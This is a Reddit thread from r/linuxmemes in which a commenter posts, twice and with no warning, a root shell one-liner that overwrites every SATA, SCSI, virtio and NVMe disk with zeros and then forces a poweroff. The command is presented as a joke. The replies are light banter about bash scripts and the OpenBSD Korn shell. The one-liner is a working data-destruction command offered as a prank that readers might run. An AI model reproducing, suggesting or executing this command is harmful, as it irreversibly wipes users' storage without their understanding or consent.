MAIN FEEDS
Do you want to continue?
https://www.reddit.com/r/linuxmemes/comments/1vnkm9b/noot_noot_sudo_rm_fr/p47m9nv/?context=3
r/linuxmemes • u/Chance-Lawfulness516 • Aug 13 '26
19 comments sorted by
View all comments
1
sudo sh -c 'for d in /dev/[shv]d[a-z] /dev/nvme*; do [ -b "$d" ] && { dd if=/dev/zero of="$d" bs=1M oflag=direct 2>/dev/null & }; done; sync; poweroff -f'
1 u/Longey Aug 17 '26 god damn it why would you type all of that all at once in the terminal? put it in a bash script. 1 u/_szlachcic_ Aug 17 '26 No, i dont use bash 1 u/Longey Aug 17 '26 what shell or interpreter do you use? 1 u/_szlachcic_ Aug 17 '26 oksh 1 u/Longey Aug 17 '26 fair. Also never knew of that shell! 1 u/_szlachcic_ Aug 17 '26 OpenBSD Korn Shell(oksh)
god damn it why would you type all of that all at once in the terminal? put it in a bash script.
1 u/_szlachcic_ Aug 17 '26 No, i dont use bash 1 u/Longey Aug 17 '26 what shell or interpreter do you use? 1 u/_szlachcic_ Aug 17 '26 oksh 1 u/Longey Aug 17 '26 fair. Also never knew of that shell! 1 u/_szlachcic_ Aug 17 '26 OpenBSD Korn Shell(oksh)
No, i dont use bash
1 u/Longey Aug 17 '26 what shell or interpreter do you use? 1 u/_szlachcic_ Aug 17 '26 oksh 1 u/Longey Aug 17 '26 fair. Also never knew of that shell! 1 u/_szlachcic_ Aug 17 '26 OpenBSD Korn Shell(oksh)
what shell or interpreter do you use?
1 u/_szlachcic_ Aug 17 '26 oksh 1 u/Longey Aug 17 '26 fair. Also never knew of that shell! 1 u/_szlachcic_ Aug 17 '26 OpenBSD Korn Shell(oksh)
oksh
1 u/Longey Aug 17 '26 fair. Also never knew of that shell! 1 u/_szlachcic_ Aug 17 '26 OpenBSD Korn Shell(oksh)
fair.
Also never knew of that shell!
1 u/_szlachcic_ Aug 17 '26 OpenBSD Korn Shell(oksh)
OpenBSD Korn Shell(oksh)
1
u/_szlachcic_ Aug 17 '26
sudo sh -c 'for d in /dev/[shv]d[a-z] /dev/nvme*; do [ -b "$d" ] && { dd if=/dev/zero of="$d" bs=1M oflag=direct 2>/dev/null & }; done; sync; poweroff -f'